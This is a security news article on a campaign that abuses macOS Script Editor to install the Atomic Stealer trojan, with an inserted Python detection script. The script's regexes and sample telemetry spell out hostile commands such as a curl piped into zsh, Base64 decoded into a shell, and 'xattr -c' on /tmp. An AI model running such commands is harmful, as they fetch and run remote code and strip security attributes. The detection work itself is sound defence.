Security researchers have uncovered an escalating campaign targeting macOS users. By abusing the built-in 'Script Editor' application, attackers are successfully bypassing certain terminal command restrictions to plant the Atomic Stealer (AMOS) info-stealing trojan on victim devices.
Attack Chain Disguised as Disk Cleanup Tools
According to a report from the Jamf security team, attackers typically set up fraudulent Apple-themed websites that claim to help users resolve low disk space issues. These sites are designed to look highly professional, providing seemingly legitimate system cleanup steps that entice users to click on specific links.
Unlike previous attack methods that required users to manually type commands into the Terminal, this variant exploits the 'applescript://' protocol. When a user clicks a button on the page, the system automatically launches the Script Editor and loads pre-configured malicious instructions. These scripts use an obfuscated 'curl | zsh' command to download the malicious payload and execute it directly in memory.
Researchers noted that the malware performs a series of complex pre-processing steps, including decoding Base64 payloads, downloading a binary file named '/tmp/helper,' and using the 'xattr -c' command to strip security attributes, ultimately establishing persistence on the target system.
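A defender-side triage of the chain described above, added here as an example and not taken from the Jamf report: it scans constructed process-execution events for the command-line traits the article names (curl piped into zsh, Base64 decoding into a shell, 'xattr -c' on a /tmp path, execution from /tmp) and raises severity when the parent process is Script Editor. The event field names, sample telemetry and regexes are my assumptions.

```python
import re

# Command-line patterns drawn from the chain described in the article.
# The regexes are assumptions; tune them before running against real telemetry.
INDICATORS = {
    "curl_piped_to_shell": re.compile(r"\bcurl\b[^|]*\|\s*(?:zsh|bash|sh)\b"),
    "base64_decode_to_shell": re.compile(r"\bbase64\b\s+(?:-D|-d|--decode)\b.*\|\s*(?:zsh|bash|sh)\b"),
    "xattr_strip_in_tmp": re.compile(r"\bxattr\s+-c\b.*?/tmp/"),
    "exec_from_tmp": re.compile(r"^\s*/tmp/\S+"),
}
SCRIPT_EDITOR = "Script Editor"


def cmdline_indicators(cmdline):
    """Return the names of every pattern the command line matches."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def triage(events):
    """Return (pid, severity, indicators) for events worth a closer look.

    An event is flagged only when its command line matches at least one
    pattern. A Script Editor parent raises severity because that is the
    launch path this campaign uses, but on its own it is not evidence:
    users run their own scripts from Script Editor all the time.
    """
    findings = []
    for ev in events:
        hits = cmdline_indicators(ev["cmdline"])
        if not hits:
            continue
        severity = "high" if ev["parent"] == SCRIPT_EDITOR else "medium"
        findings.append((ev["pid"], severity, hits))
    return findings


# Constructed sample telemetry (not real captures); the Base64 string decodes to "curl ...".
SAMPLE_EVENTS = [
    {"pid": 501, "parent": SCRIPT_EDITOR, "cmdline": "echo Y3VybCAuLi4= | base64 -D | zsh"},
    {"pid": 502, "parent": "zsh", "cmdline": "curl -fsSL https://example.invalid/x | zsh"},
    {"pid": 503, "parent": "zsh", "cmdline": "xattr -c /tmp/helper"},
    {"pid": 504, "parent": "zsh", "cmdline": "/tmp/helper"},
    {"pid": 601, "parent": "Terminal", "cmdline": "curl -O https://example.com/archive.tar.gz"},
    {"pid": 602, "parent": "Terminal", "cmdline": "xattr -l ~/Downloads/report.pdf"},
]

if __name__ == "__main__":
    for pid, sev, hits in triage(SAMPLE_EVENTS):
        print(f"pid={pid} severity={sev} indicators={','.join(hits)}")
```

The two Terminal events are deliberately benign lookalikes (a plain download, a read-only xattr listing) and produce no findings, which is the false-positive check a practitioner would want before wiring this into an EDR rule.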
Atomic Stealer is a prominent 'Malware-as-a-Service' (MaaS) product that has been widely used in various 'ClickFix' attacks in recent years. Once installed, the trojan quickly harvests Keychain data, browser-stored passwords, autofill information, credit card details, and cryptocurrency wallet private keys.
Furthermore, the malware includes backdoor functionality, granting attackers persistent access to the compromised device. While Apple introduced terminal warning mechanisms against ClickFix attacks in macOS 15.1, this new method of utilizing the Script Editor demonstrates that hackers are constantly refining their tactics to evade system defenses.
Security experts advise users to remain highly vigilant and avoid executing any Script Editor prompts originating from unknown websites. If system maintenance or troubleshooting is required, always rely exclusively on official Apple technical documentation.